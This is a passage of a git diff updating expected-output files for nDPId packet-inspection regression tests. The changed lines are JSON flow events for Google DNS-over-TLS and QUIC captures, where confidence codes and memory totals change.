+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":532,"packets-processed":532,"total-skipped-flows":0,"total-l4-payload-len":97842,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":6,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1592553079303} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 532/532 @@ -65,9 +65,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5918203 bytes -~~ total memory freed........: 5918203 bytes -~~ total allocations/frees...: 118740/118740 +~~ total memory allocated....: 6051837 bytes +~~ total memory freed........: 6051837 bytes +~~ total allocations/frees...: 121502/121502 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1424 chars diff --git a/test/results/gquic.pcap.out b/test/results/gquic.pcap.out index 3fce25de3..f1fda4c88 100644 --- a/test/results/gquic.pcap.out +++ b/test/results/gquic.pcap.out @@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591876186378} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591876186378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1591876186378,"pkt":"6PckTkFdoMWJ9P+XCABFAAVieo1AAIARvdoKLAUZ2DrVo+6pAbsFTko2w1EwNTAIAXaX8XoV5u8AAEU0NFnBgsF5hkBVQ9QcdhAQB7AX4STVuX+cZkTXcyq7Q06MKI3IMV7nn3XwVsYd8lSM2UQ2Mh\/Lz0P54TH133\/BjF8sKcZx48\/VepMyZjozNf6hUhocgBAvamo29IXHVqILxpkl4wjCzjbjeV119chifFcXxaTjllFkxsh3XmLG5348E\/qK2TLLnMy43JAHw6S2e1v2BO4WXkya\/bcrsjPnQYikRvTxH8li9ZflQ5PttsYcSUtQigVmzX+3zu6YljUMgwCKrGbUc4ym0tN37M5ly\/uhm21+A6fvtyySGNQfP7wJOsR1iWGsA6NR+V\/fmgbvfd72gKd0sTHFADbRPSKYDc0XDK\/X8vG8GXGEknHbOT7DGSzLKpHYvLrwIaFjsweHE6gkta44k2oP3lJ5y\/ohylLleMWOzrznvbvHmPDTo6fznFlCwcMwiT5bU7kKdr22dfJC4HZKXgrfdx\/kyr9W7YgF8ndv1gEMp60hGoa3HeIkNrwcimMUj8lo1MQMLSdfIURLgLYuYXeqNU9nrCpCTOHF8rljnTLtemFl5GKnW4QO+Vn8YQU0wC2WniPFD0JOSE\/9\/8uhjdFWVDMbiGWhYk1SCdcSCnwwatMyU\/DcpZqDI25eb58WZqvNqtnsCmojU\/8N4SjVKXFe6sqZF9Vu2GvgHDvSqxDzjeY9qlts4TuIbe+gH+w1MKU7JxNtGZ08YyKdDEVfiklQ\/xyvSgH5AGRqlnD6igJ7NF54pjKD67q+V\/b7AzUVhGIbpajDS4rvn+fDdhXSGqLFbtHNBw9zOlfyLlg3QCkztn+awCGkuUrUQJWRuzHeXcQ9Pm+GTWr4ztxdNe8GOdcH0fw\/02FqwqbZa0xgXb6ogDH\/Z7u3OTt5CsB\/hPp4imvHezect7LAbuRcIJ+tmXKeqwNdUGoyV614kYKA0aTDm4QbBmp4nIg9dspzjXHExZ33U9zxLwZ8DYwQJDoYhywocb4+jKp5OhFT0Egt5ANj4PPsKNBEjNDxnpAKCiI11YkYMyYj1BSFJ2mKW5kFXZ2\/Uk7W0jKMRykBFSaIJ+fwu1W4yhNjDR69KpOGwGw5d47DA9U+Gj7qbRCpjgb1v145AzbIQNTU\/mwU8gqij0o+rVb\/pUEtWMRho\/Yukqvj0PDpk20u\/iMNduvSEQAQLt7IA31zZMJsdzUDXqeH4lvAJTdAXDM+BfHOutfryXO0ilZKrrhbJmj03RyAieSkoI7y9TYI7udqZUukM2QcgXS180FYjb94yLuFlXG0La9U7oT6UzgYEOrDdq4bcoWorhw9j4EjTTcsFMkNO8f65TlicSD0KdGh7ggCR8NtD2qMSi4KIMxq9IHmGPWBJODrdc1+LXcmA3ApoiY81zbK2QPTdK0LHWSdeauC3LCzY9zJ5bEtZvA4hiamdfZl4E5cxC\/raRilWW9+sNuXDrAH9rw48q66KiLSEC63yDpS1q549REO+OCEIx8SKQQoN1W6tspnVZ3EKLwuCby00TS84gP7\/ke1UZsRSUTrMeCETmkIya9DRfJn3gxYto584jg1Sk6Axi4aJ8MlnhdHfC\/0XWQrVM1UOD3\/J3K5XZUZKJ5vUWJzfBTgAe8J4\/heUMD2WmkBuQIER6hh9JGvwyZ2I6vJO7KXsorNCeXZA6iFfdtk90sqEl67LnWUAJmZ\/6NzgV\/JXrGoQRR0uqoWVC\/xj1u+c66MRH8y3Tf8DUoZ1L57SrRzGrkWBB6B2RSkfxWVzZUSCgEgPU4Lp+fnv6pDzh8zifmLUphU5Jycotx7"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"canary Chrome\/85.0.4169.0 Windows NT 10.0; Win64; x64"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 